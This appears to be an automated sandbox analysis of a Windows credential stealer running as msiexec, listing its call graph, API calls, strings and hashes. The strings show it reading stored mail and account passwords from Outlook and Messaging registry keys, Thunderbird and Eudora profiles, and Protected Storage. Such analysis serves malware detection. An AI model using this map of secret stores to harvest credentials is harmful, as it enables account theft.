33676 403e46 _mbscpy 33673->33676 33821 40fb00 33675->33821 33869 40f334 333 API calls 33676->33869 33685 410807 33684->33685 33686 4107fc FreeLibrary 33684->33686 33685->33491 33686->33685 33688 404785 FreeLibrary 33687->33688 33689 40473b LoadLibraryA 33688->33689 33690 40474c GetProcAddress 33689->33690 33691 40476e 33689->33691 33690->33691 33693 404764 33690->33693 33692 404781 33691->33692 33694 404785 FreeLibrary 33691->33694 33692->33491 33693->33691 33694->33692 33696 4047a3 33695->33696 33697 404799 FreeLibrary 33695->33697 33696->33491 33697->33696 33698->33493 33700 4037c5 33699->33700 33701 4036fb 33699->33701 33700->33631 33870 410863 UuidFromStringA UuidFromStringA memcpy CoTaskMemFree 33701->33870 33703 40370e 33703->33700 33704 403716 strchr 33703->33704 33704->33700 33705 403730 33704->33705 33871 4021b6 memset 33705->33871 33707 40373f _mbscpy _mbscpy strlen 33708 4037a4 _mbscpy 33707->33708 33709 403789 sprintf 33707->33709 33872 4023e5 16 API calls 33708->33872 33709->33708 33712 4085e2 33711->33712 33873 4082cd 11 API calls 33712->33873 33714 4085ec 33715 403cba 33714->33715 33716 40860b memset 33714->33716 33723 40821d 33715->33723 33875 410b62 RegEnumKeyExA 33716->33875 33718 40865c memset 33876 410add RegQueryValueExA 33718->33876 33721 408637 33721->33715 33721->33718 33877 40848b 10 API calls 33721->33877 33878 410b62 RegEnumKeyExA 33721->33878 33724 40823f 33723->33724 33725 403cc6 33724->33725 33726 408246 memset 33724->33726 33731 4086e0 33725->33731 33879 410b62 RegEnumKeyExA 33726->33879 33728 40826f 33728->33725 33880 4080ed 11 API calls 33728->33880 33881 410b62 RegEnumKeyExA 33728->33881 33882 4045db 33731->33882 33733 4088ef 33890 404656 33733->33890 33737 408737 wcslen 33737->33733 33743 40876a 33737->33743 33738 40877a wcsncmp 33738->33743 33740 404734 3 API calls 33740->33743 33741 404785 FreeLibrary 33741->33743 33742 408812 memset 33742->33743 33744 40883c memcpy wcschr 33742->33744 33743->33733 33743->33738 33743->33740 33743->33741 33743->33742 33743->33744 33745 4088c3 LocalFree 33743->33745 33893 40466b _mbscpy 33743->33893 33744->33743 33745->33743 33747 402c7a 33746->33747 33748 402d9a 33747->33748 33749 402c87 memset 33747->33749 33748->33649 33894 410b62 RegEnumKeyExA 33749->33894 33751 410b1e RegQueryValueExA 33752 402ce4 memset sprintf 33751->33752 33754 402cb2 33752->33754 33753 402d3a sprintf 33753->33754 33754->33748 33754->33751 33754->33753 33895 402bd1 37 API calls 33754->33895 33896 402bd1 37 API calls 33754->33896 33897 410b62 RegEnumKeyExA 33754->33897 33759 410816 33758->33759 33760 4107f1 FreeLibrary 33759->33760 33761 403ddd 33760->33761 33761->33659 33763 402ff9 33762->33763 33764 403006 memset 33763->33764 33765 403122 33763->33765 33898 410b62 RegEnumKeyExA 33764->33898 33765->33663 33767 410b1e RegQueryValueExA 33768 403058 memset sprintf 33767->33768 33773 403033 33768->33773 33769 4030a2 memset 33899 410b62 RegEnumKeyExA 33769->33899 33770 410b62 RegEnumKeyExA 33770->33773 33773->33765 33773->33767 33773->33769 33773->33770 33900 402db3 24 API calls 33773->33900 33775 4032d5 33774->33775 33776 4033a9 33774->33776 33901 4021b6 memset 33775->33901 33789 4034e4 memset memset 33776->33789 33778 4032e1 33902 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33778->33902 33780 4032ea 33781 4032f8 memset GetPrivateProfileSectionA 33780->33781 33903 4023e5 16 API calls 33780->33903 33781->33776 33786 40332f 33781->33786 33783 40339b strlen 33783->33776 33783->33786 33785 403350 strchr 33785->33786 33786->33776 33786->33783 33904 4021b6 memset 33786->33904 33905 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33786->33905 33906 4023e5 16 API calls 33786->33906 33790 410b1e RegQueryValueExA 33789->33790 33791 40353f 33790->33791 33792 40357f 33791->33792 33793 403546 _mbscpy 33791->33793 33797 403985 33792->33797 33907 406d55 strlen _mbscat 33793->33907 33795 403565 _mbscat 33908 4033f0 19 API calls 33795->33908 33909 40466b _mbscpy 33797->33909 33801 4039aa 33803 4039ff 33801->33803 33910 40f6e2 33801->33910 33926 40f460 12 API calls 33801->33926 33927 4038e8 21 API calls 33801->33927 33804 404785 FreeLibrary 33803->33804 33805 403a0b 33804->33805 33806 4037ca memset memset 33805->33806 33929 444551 memset 33806->33929 33809 4038e2 33809->33673 33868 40f334 333 API calls 33809->33868 33811 40382e 33812 406f06 2 API calls 33811->33812 33813 403843 33812->33813 33814 406f06 2 API calls 33813->33814 33815 403855 strchr 33814->33815 33816 403884 _mbscpy 33815->33816 33817 403897 strlen 33815->33817 33818 4038bf _mbscpy 33816->33818 33817->33818 33819 4038a4 sprintf 33817->33819 33938 4023e5 16 API calls 33818->33938 33819->33818 33823 40fb10 33821->33823 33822 403e7f 33831 40f96c 33822->33831 33823->33822 33824 40fb55 RegQueryValueExA 33823->33824 33824->33822 33825 40fb84 33824->33825 33826 404734 3 API calls 33825->33826 33827 40fb91 33826->33827 33827->33822 33828 40fc19 LocalFree 33827->33828 33829 40fbdd memcpy memcpy 33827->33829 33828->33822 33942 40f802 7 API calls 33829->33942 33832 4070ae GetVersionExA 33831->33832 33833 40f98d 33832->33833 33834 4045db 7 API calls 33833->33834 33838 40f9a9 33834->33838 33835 40fae6 33836 404656 FreeLibrary 33835->33836 33837 403e85 33836->33837 33843 4442ea memset 33837->33843 33838->33835 33839 40fa13 memset WideCharToMultiByte 33838->33839 33839->33838 33840 40fa43 _strnicmp 33839->33840 33840->33838 33841 40fa5b WideCharToMultiByte 33840->33841 33841->33838 33842 40fa88 WideCharToMultiByte 33841->33842 33842->33838 33844 410dbb 7 API calls 33843->33844 33845 444329 33844->33845 33943 40759e strlen strlen 33845->33943 33850 410dbb 7 API calls 33851 444350 33850->33851 33852 40759e 3 API calls 33851->33852 33853 44435a 33852->33853 33854 444212 64 API calls 33853->33854 33855 444366 memset memset 33854->33855 33856 410b1e RegQueryValueExA 33855->33856 33857 4443b9 ExpandEnvironmentStringsA strlen 33856->33857 33858 4443f4 _strcmpi 33857->33858 33859 4443e5 33857->33859 33860 403e91 33858->33860 33861 44440c 33858->33861 33859->33858 33860->33491 33862 444212 64 API calls 33861->33862 33862->33860 33863->33644 33864->33645 33865->33652 33866->33654 33867->33655 33868->33673 33869->33675 33870->33703 33871->33707 33872->33700 33874 40841c 33873->33874 33874->33714 33875->33721 33876->33721 33877->33721 33878->33721 33879->33728 33880->33728 33881->33728 33883 404656 FreeLibrary 33882->33883 33884 4045e3 LoadLibraryA 33883->33884 33885 404651 33884->33885 33886 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33884->33886 33885->33733 33885->33737 33887 40463d 33886->33887 33888 404643 33887->33888 33889 404656 FreeLibrary 33887->33889 33888->33885 33889->33885 33891 404666 33890->33891 33892 40465c FreeLibrary 33890->33892 33891->33642 33892->33891 33893->33743 33894->33754 33895->33753 33896->33754 33897->33754 33898->33773 33899->33773 33900->33773 33901->33778 33902->33780 33903->33781 33904->33785 33905->33786 33906->33786 33907->33795 33908->33792 33909->33801 33928 40466b _mbscpy 33910->33928 33912 40f6fa 33913 4045db 7 API calls 33912->33913 33914 40f708 33913->33914 33915 404734 3 API calls 33914->33915 33920 40f7e2 33914->33920 33921 40f715 33915->33921 33916 404656 FreeLibrary 33917 40f7f1 33916->33917 33918 404785 FreeLibrary 33917->33918 33919 40f7fc 33918->33919 33919->33801 33920->33916 33921->33920 33922 40f797 WideCharToMultiByte 33921->33922 33923 40f7b8 strlen 33922->33923 33924 40f7d9 LocalFree 33922->33924 33923->33924 33925 40f7c8 _mbscpy 33923->33925 33924->33920 33925->33924 33926->33801 33927->33801 33928->33912 33930 44458b 33929->33930 33931 40381a 33930->33931 33939 410add RegQueryValueExA 33930->33939 33931->33809 33937 4021b6 memset 33931->33937 33933 4445a4 33933->33931 33940 410add RegQueryValueExA 33933->33940 33935 4445c1 33935->33931 33941 444879 30 API calls 33935->33941 33937->33811 33938->33809 33939->33933 33940->33935 33941->33931 33942->33828 33944 4075c9 33943->33944 33945 4075bb _mbscat 33943->33945 33946 444212 33944->33946 33945->33944 33963 407e9d 33946->33963 33949 44424d 33950 444274 33949->33950 33951 444258 33949->33951 33971 407ef8 33949->33971 33952 407e9d 9 API calls 33950->33952 33988 444196 51 API calls 33951->33988 33959 4442a0 33952->33959 33954 407ef8 9 API calls 33954->33959 33955 4442ce 33985 407f90 33955->33985 33959->33954 33959->33955 33961 444212 64 API calls 33959->33961 33981 407e62 33959->33981 33960 407f90 FindClose 33962 4442e4 33960->33962 33961->33959 33962->33850 33964 407f90 FindClose 33963->33964 33965 407eaa 33964->33965 33966 406f06 2 API calls 33965->33966 33967 407ebd strlen strlen 33966->33967 33968 407ee1 33967->33968 33969 407eea 33967->33969 33989 4070e3 strlen _mbscat _mbscpy _mbscat 33968->33989 33969->33949 33972 407f03 FindFirstFileA 33971->33972 33973 407f24 FindNextFileA 33971->33973 33974 407f3f 33972->33974 33975 407f46 strlen strlen 33973->33975 33976 407f3a 33973->33976 33974->33975 33978 407f7f 33974->33978 33975->33978 33979 407f76 33975->33979 33977 407f90 FindClose 33976->33977 33977->33974 33978->33949 33990 4070e3 strlen _mbscat _mbscpy _mbscat 33979->33990 33982 407e94 33981->33982 33983 407e6c strcmp 33981->33983 33982->33959 33983->33982 33984 407e83 strcmp 33983->33984 33984->33982 33986 407fa3 33985->33986 33987 407f99 FindClose 33985->33987 33986->33960 33987->33986 33988->33949 33989->33969 33990->33978 33991->33504 33992->33508 33993->33514 33994->33515 33995->33521 33996->33518 33997->33513 34015 411853 RtlInitializeCriticalSection memset 34016 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34191 40a256 13 API calls 34193 432e5b 17 API calls 34195 43fa5a 20 API calls 34018 401060 41 API calls 34198 427260 CloseHandle memset memset 34022 410c68 FindResourceA SizeofResource LoadResource LockResource 34200 405e69 14 API calls 34024 433068 15 API calls __fprintf_l 34202 414a6d 18 API calls 34203 43fe6f 134 API calls 34026 424c6d 15 API calls __fprintf_l 34204 426741 19 API calls 34028 440c70 17 API calls 34029 443c71 42 API calls 34032 427c79 24 API calls 34207 416e7e memset __fprintf_l 34036 42800b 47 API calls 34037 425115 85 API calls __fprintf_l 34210 41960c 61 API calls 34038 43f40c 122 API calls __fprintf_l 34041 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34042 43f81a 20 API calls 34044 414c20 memset memset 34045 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34214 414625 18 API calls 34215 404225 modf 34216 403a26 strlen WriteFile 34218 40422a 12 API calls 34222 427632 memset memset memcpy 34223 40ca30 59 API calls 34224 404235 26 API calls 34046 42ec34 61 API calls __fprintf_l 34047 425115 76 API calls __fprintf_l 34225 425115 77 API calls __fprintf_l 34227 44223a 38 API calls 34053 43183c 112 API calls 34228 44b2c5 _onexit __dllonexit 34233 42a6d2 memcpy __allrem 34055 405cda 60 API calls 34241 43fedc 138 API calls 34242 4116e1 16 API calls __fprintf_l 34058 4244e6 19 API calls 34060 42e8e8 127 API calls __fprintf_l 34061 4118ee RtlLeaveCriticalSection 34247 43f6ec 22 API calls 34063 425115 119 API calls __fprintf_l 34064 410cf3 EnumResourceNamesA 34250 4492f0 memcpy memcpy 34252 43fafa 18 API calls 34254 4342f9 15 API calls __fprintf_l 34065 4144fd 19 API calls 34256 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34257 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34260 443a84 _mbscpy 34262 43f681 17 API calls 34068 404487 22 API calls 34264 415e8c 16 API calls __fprintf_l 34072 411893 RtlDeleteCriticalSection __fprintf_l 34073 41a492 42 API calls 34268 403e96 34 API calls 34269 410e98 memset SHGetPathFromIDList SendMessageA 34075 426741 109 API calls __fprintf_l 34076 4344a2 18 API calls 34077 4094a2 10 API calls 34272 4116a6 15 API calls __fprintf_l 34273 43f6a4 17 API calls 34274 440aa3 20 API calls 34276 427430 45 API calls 34080 4090b0 7 API calls 34081 4148b0 15 API calls 34083 4118b4 RtlEnterCriticalSection 34084 4014b7 CreateWindowExA 34085 40c8b8 19 API calls 34087 4118bf RtlTryEnterCriticalSection 34281 42434a 18 API calls __fprintf_l 34283 405f53 12 API calls 34095 43f956 59 API calls 34097 40955a 17 API calls 34098 428561 36 API calls 34099 409164 7 API calls 34287 404366 19 API calls 34291 40176c ExitProcess 34294 410777 42 API calls 34104 40dd7b 51 API calls 34105 425d7c 16 API calls __fprintf_l 34296 43f6f0 25 API calls 34297 42db01 22 API calls 34106 412905 15 API calls __fprintf_l 34298 403b04 54 API calls 34299 405f04 SetDlgItemTextA GetDlgItemTextA 34300 44b301 ??3@YAXPAX 34303 4120ea 14 API calls 3 library calls 34304 40bb0a 8 API calls 34306 413f11 strcmp 34110 434110 17 API calls __fprintf_l 34113 425115 108 API calls __fprintf_l 34307 444b11 _onexit 34115 425115 76 API calls __fprintf_l 34118 429d19 10 API calls 34310 444b1f __dllonexit 34311 409f20 _strcmpi 34120 42b927 31 API calls 34314 433f26 19 API calls __fprintf_l 34315 44b323 FreeLibrary 34316 427f25 46 API calls 34317 43ff2b 17 API calls 34318 43fb30 19 API calls 34127 414d36 16 API calls 34129 40ad38 7 API calls 34320 433b38 16 API calls __fprintf_l 33998 44b33b 33999 44b344 ??3@YAXPAX 33998->33999 34000 44b34b 33998->34000 33999->34000 34001 44b354 ??3@YAXPAX 34000->34001 34002 44b35b 34000->34002 34001->34002 34003 44b364 ??3@YAXPAX 34002->34003 34004 44b36b 34002->34004 34003->34004 34005 44b374 ??3@YAXPAX 34004->34005 34006 44b37b 34004->34006 34005->34006 34133 426741 21 API calls 34134 40c5c3 123 API calls 34136 43fdc5 17 API calls 34321 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34139 4161cb memcpy memcpy memcpy memcpy 34326 43ffc8 18 API calls 34140 4281cc 15 API calls __fprintf_l 34328 4383cc 110 API calls __fprintf_l 34141 4275d3 41 API calls 34329 4153d3 22 API calls __fprintf_l 34142 444dd7 _XcptFilter 34334 4013de 15 API calls 34336 425115 111 API calls __fprintf_l 34337 43f7db 18 API calls 34340 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34144 4335ee 16 API calls __fprintf_l 34342 429fef 11 API calls 34145 444deb _exit _c_exit 34343 40bbf0 133 API calls 34148 425115 79 API calls __fprintf_l 34347 437ffa 22 API calls 34152 4021ff 14 API calls 34153 43f5fc 149 API calls 34348 40e381 9 API calls 34155 405983 40 API calls 34156 42b186 27 API calls __fprintf_l 34157 427d86 76 API calls 34158 403585 20 API calls 34160 42e58e 18 API calls __fprintf_l 34163 425115 75 API calls __fprintf_l 34165 401592 8 API calls 33201 410b92 33204 410a6b 33201->33204 33203 410bb2 33205 410a77 33204->33205 33206 410a89 GetPrivateProfileIntA 33204->33206 33209 410983 memset _itoa WritePrivateProfileStringA 33205->33209 33206->33203 33208 410a84 33208->33203 33209->33208 34352 434395 16 API calls 34167 441d9c memcmp 34354 43f79b 119 API calls 34168 40c599 42 API calls 34355 426741 87 API calls 34172 4401a6 21 API calls 34174 426da6 memcpy memset memset memcpy 34175 4335a5 15 API calls 34177 4299ab memset memset memcpy memset memset 34178 40b1ab 8 API calls 34360 425115 76 API calls __fprintf_l 34364 4113b2 18 API calls 2 library calls 34368 40a3b8 memset sprintf SendMessageA 33210 410bbc 33213 4109cf 33210->33213 33214 4109dc 33213->33214 33215 410a23 memset GetPrivateProfileStringA 33214->33215 33216 4109ea memset 33214->33216 33221 407646 strlen 33215->33221 33226 4075cd sprintf memcpy 33216->33226 33219 410a65 33220 410a0c WritePrivateProfileStringA 33220->33219 33222 40765a 33221->33222 33224 40765c 33221->33224 33222->33219 33223 4076a3 33223->33219 33224->33223 33227 40737c strtoul 33224->33227 33226->33220 33227->33224 34180 40b5bf memset memset _mbsicmp

                                                                                                        Executed Functions

                                                                                                        Function 004082CD Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 145stringCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 132 408484-408488 130->132 133 408455-40845e 130->133 134 408422-40842b 131->134 135 408460-408464 133->135 136 408465-408482 133->136 137 408432-40844e 134->137 138 40842d-408431 134->138 135->136 136->132 136->133 137->130 137->134 138->137
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 0040832F
                                                                                                        • memset.MSVCRT ref: 00408343
                                                                                                        • memset.MSVCRT ref: 0040835F
                                                                                                        • memset.MSVCRT ref: 00408376
                                                                                                        • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                        • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                        • strlen.MSVCRT ref: 004083E9
                                                                                                        • strlen.MSVCRT ref: 004083F8
                                                                                                        • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                                        • String ID: 5$H$O$b$i$}$}
                                                                                                        • API String ID: 1832431107-3760989150
                                                                                                        • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                                                        • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                                                                        • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                                                        • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
                                                                                                        Function 00407EF8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58filestringCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 335 407ef8-407f01 336 407f03-407f22 FindFirstFileA 335->336 337 407f24-407f38 FindNextFileA 335->337 338 407f3f-407f44 336->338 339 407f46-407f74 strlen * 2 337->339 340 407f3a call 407f90 337->340 338->339 342 407f89-407f8f 338->342 343 407f83 339->343 344 407f76-407f81 call 4070e3 339->344 340->338 346 407f86-407f88 343->346 344->346 346->342
                                                                                                        APIs
                                                                                                        • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                                                                        • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                                                                        • strlen.MSVCRT ref: 00407F5C
                                                                                                        • strlen.MSVCRT ref: 00407F64
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileFindstrlen$FirstNext
                                                                                                        • String ID: ACD
                                                                                                        • API String ID: 379999529-620537770
                                                                                                        • Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                                                        • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                                                                        • Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                                                        • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A
                                                                                                        Function 00401E69 Relevance: 51.0, APIs: 18, Strings: 11, Instructions: 261stringCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 00401E8B
                                                                                                        • strlen.MSVCRT ref: 00401EA4
                                                                                                        • strlen.MSVCRT ref: 00401EB2
                                                                                                        • strlen.MSVCRT ref: 00401EF8
                                                                                                        • strlen.MSVCRT ref: 00401F06
                                                                                                        • memset.MSVCRT ref: 00401FB1
                                                                                                        • atoi.MSVCRT(?), ref: 00401FE0
                                                                                                        • memset.MSVCRT ref: 00402003
                                                                                                        • sprintf.MSVCRT ref: 00402030
                                                                                                        • memset.MSVCRT ref: 00402086
                                                                                                        • memset.MSVCRT ref: 0040209B
                                                                                                        • strlen.MSVCRT ref: 004020A1
                                                                                                        • strlen.MSVCRT ref: 004020AF
                                                                                                        • strlen.MSVCRT ref: 004020E2
                                                                                                        • strlen.MSVCRT ref: 004020F0
                                                                                                        • memset.MSVCRT ref: 00402018
                                                                                                          • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                          • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                        • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                                                                                                          • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                                        • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: strlen$memset$_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                                                                        • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                                        • API String ID: 3833278029-4223776976
                                                                                                        • Opcode ID: 22bf87547929d6464d555c30866af4eff336c20ded2a6a53d3974d6186b3e924
                                                                                                        • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                                                                        • Opcode Fuzzy Hash: 22bf87547929d6464d555c30866af4eff336c20ded2a6a53d3974d6186b3e924
                                                                                                        • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D
                                                                                                        Function 0040CF44 Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 169COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                          • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                                                          • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                                          • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                                                          • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                                                                                                        • DeleteObject.GDI32(?), ref: 0040D1A6
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                                                        • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                                                                        • API String ID: 745651260-375988210
                                                                                                        • Opcode ID: 01abe85119e862d03ebbcbf30b96c63784c41f31500a9bb9b68e18ec68e211b7
                                                                                                        • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                                                                        • Opcode Fuzzy Hash: 01abe85119e862d03ebbcbf30b96c63784c41f31500a9bb9b68e18ec68e211b7
                                                                                                        • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A
                                                                                                        Function 00403C16 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 184libraryloaderCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                          • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                                                        • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                                                                        • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                                                                        • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                                                                                        Strings
                                                                                                        • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                                                                        • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                                                                        • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                                                                        • pstorec.dll, xrefs: 00403C30
                                                                                                        • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                                                                        • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                                                                        • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                                                                        • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                                                                        • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                                                                        • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                                                                        • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                                                                        • PStoreCreateInstance, xrefs: 00403C44
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Library$AddressFreeLoadProc_mbscpy
                                                                                                        • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                                        • API String ID: 1197458902-317895162
                                                                                                        • Opcode ID: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                                                                        • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                                                                        • Opcode Fuzzy Hash: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                                                                        • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699
                                                                                                        Function 00444C4A Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 128COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 231 444c4a-444c66 call 444e38 GetModuleHandleA 234 444c87-444c8a 231->234 235 444c68-444c73 231->235 237 444cb3-444d00 __set_app_type __p__fmode __p__commode call 444e34 234->237 235->234 236 444c75-444c7e 235->236 239 444c80-444c85 236->239 240 444c9f-444ca3 236->240 245 444d02-444d0d __setusermatherr 237->245 246 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 237->246 239->234 243 444c8c-444c93 239->243 240->234 241 444ca5-444ca7 240->241 244 444cad-444cb0 241->244 243->234 247 444c95-444c9d 243->247 244->237 245->246 250 444da4-444da7 246->250 251 444d6a-444d72 246->251 247->244 252 444d81-444d85 250->252 253 444da9-444dad 250->253 254 444d74-444d76 251->254 255 444d78-444d7b 251->255 257 444d87-444d89 252->257 258 444d8b-444d9c GetStartupInfoA 252->258 253->250 254->251 254->255 255->252 256 444d7d-444d7e 255->256 256->252 257->256 257->258 259 444d9e-444da2 258->259 260 444daf-444db1 258->260 261 444db2-444dc6 GetModuleHandleA call 40cf44 259->261 260->261 264 444dcf-444e0f _cexit call 444e71 261->264 265 444dc8-444dc9 exit 261->265 265->264
                                                                                                        APIs
                                                                                                        Strings
